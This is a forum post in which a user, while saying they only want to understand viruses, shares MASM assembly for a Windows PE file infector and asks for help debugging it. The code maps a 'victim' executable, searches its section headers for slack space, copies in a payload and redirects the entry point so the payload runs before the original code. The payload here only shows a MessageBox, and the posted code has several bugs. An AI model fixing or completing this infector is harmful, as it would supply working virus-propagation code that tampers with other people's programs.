Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Categories

add new code in the end of section

At first I want to tell one important stuff. I don't want to write powerful virus. I want to understand how they are working and how antivirus programmes working.

I want to add code in the end of section. I wrote file which I want to modify.
Here is the code of file-victim:
[code]
.data

DB_strOutput DB "Dosen't infected",0
.code
_start:
invoke MessageBox, 0, offset DB_strOutput, offset DB_strOutput, MB_OK
push 0
call ExitProcess
end _start[/code]

I wrote code to modify fiile-victim:
[code].586p
.model flat,stdcall
option casemap:none

include masm32includewindows.inc
include masm32includeuser32.inc
includelib masm32libuser32.lib

include masm32includekernel32.inc
includelib masm32libkernel32.lib


.data

DB_strAddress DB "C:/firstMalware_victim.exe",0
DD_hFile_Mapping DD ?
DD_adressOfMappingFile DD ?
DD_hFile DD ?
DW_numberOfSections DW ?;????? ??????
DD_addressOfIMAGE_DOS_HEADER DD ?
DD_addressOfIMAGE_FILE_HEADER DD ?
DD_addressOfIMAGE_OPTIONAL_HEADER DD ?
DD_addressOfIMAGE_NT_HEADERS DD ?
DD_addressOfDataDirectory DD ?
DD_addressOfIMAGE_SECTION_HEADER DD ?
DB_string_forInfect DB "LOL",0;?????? ?????? 4 ?????
DD_sizeOfCode DD 0;size of code which we want to write in victim file
DD_addressToJump DD ?
DD_addressBeginOfNewCode DD ?;address where we implant new code
DD_addressOfNewString DD ?
.code
_start:

;open file
push 0
push FILE_ATTRIBUTE_NORMAL;The file does not have other attributes set. This attribute is valid only if used alone.
push OPEN_EXISTING
push 0
push FILE_SHARE_DELETE
push GENERIC_WRITE or GENERIC_READ
push offset DB_strAddress
call CreateFileA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

cmp EAX, -1;ERROR?
jz EXIT

mov DD_hFile, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;call CreateFileMapping
push 0
push 0
push 0
push PAGE_READWRITE
push 0
push DD_hFile
call CreateFileMapping
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov DD_hFile_Mapping, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;call MapViewOfFile
;Maps a view of a file mapping into the address space of a calling process.
push 0
push 0
push 0
push FILE_MAP_READ or FILE_MAP_WRITE
push DD_hFile_Mapping
call MapViewOfFile;Maps a view of a file mapping into the address space of a calling process.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

mov DD_hFile_Mapping, EAX

cmp EAX, -1;ERROR?
jz EXIT


mov DD_adressOfMappingFile, EAX;load address of loaded file
mov EDI, DD_hFile_Mapping;set address of first byte of mapping-file
assume EDI:ptr IMAGE_DOS_HEADER;EDI points to IMAGE_DOS_HEADER
mov DD_addressOfIMAGE_DOS_HEADER, EDI

add EDI, [EDI].e_lfanew
mov DD_addressOfIMAGE_NT_HEADERS, EDI
assume EDI:ptr IMAGE_NT_HEADERS
lea EAX, [EDI].FileHeader
mov AX, [EDI].FileHeader.NumberOfSections
mov DW_numberOfSections, AX
mov EAX, DD_addressOfIMAGE_FILE_HEADER
lea EDI, [EDI].OptionalHeader
mov DD_addressOfIMAGE_OPTIONAL_HEADER, EDI
assume EDI:ptr IMAGE_OPTIONAL_HEADER
lea EAX, [EDI].DataDirectory
mov DD_addressOfDataDirectory, EAX
mov EAX, DD_addressOfIMAGE_NT_HEADERS
add EAX, sizeof IMAGE_NT_HEADERS
mov DD_addressOfIMAGE_SECTION_HEADER,EAX ;address of Sections Table
assume EAX:ptr IMAGE_SECTION_HEADER
;get to know size of our code which we want to implant
mov EBX, offset Label_forInfect_start
sub EBX, Label_forInfect_end
push EBX
add EBX,4;size of our code with a string
;check sections for a free size
xor ECX, ECX
.while CX < DW_numberOfSections
mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section
.if EDX >= EBX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ECX, 4
mov ESI, offset DB_string_forInfect
mov DD_addressOfNewString, ESI
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy string to file
add DD_addressBeginOfNewCode, 4
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;copy code
;copy AddressOfEntryPoint
mov ECX, DD_addressOfIMAGE_OPTIONAL_HEADER
assume ECX:ptr IMAGE_OPTIONAL_HEADER
mov ESI, [ECX].AddressOfEntryPoint
mov DD_addressToJump, ESI;copy AddressOfEntryPoint
mov [ECX].AddressOfEntryPoint, offset Label_forInfect_start;change AddressOfEntryPoint
pop EBX
mov ECX, EBX;number of bytes which we should copy
mov ESI, Label_forInfect_start
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy code
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

jmp LabelAfterWritingToTheSections
.endif
add EAX, sizeof IMAGE_SECTION_HEADER
inc CX
.endw
LabelAfterWritingToTheSections:

EXIT:
invoke ExitProcess,0

Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump
Label_forInfect_end:
end _start[/code]

I want to add at the begin of victim's file this code:
[code]Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump
Label_forInfect_end:[/code]

But I've got one progblem. My program doesn't work.
I opend it in the debugger and found some strange stuffes:
1. There are only 3 sections in the victim's file
2. This condition doesn't excecute:
[code].if EDX >= EBX[/code]
May be I wrote somethin wrong before this.
I assume that I worked incorrectly with lds from IMAGE_SECTION_HEADER.
[code]mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section[/code]
I saw in the debugger that EDX contains negative value:
FFFFFF92
And the last question. Have I done something wrong here:
[code];get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX[/code]


Sign In or Register to comment.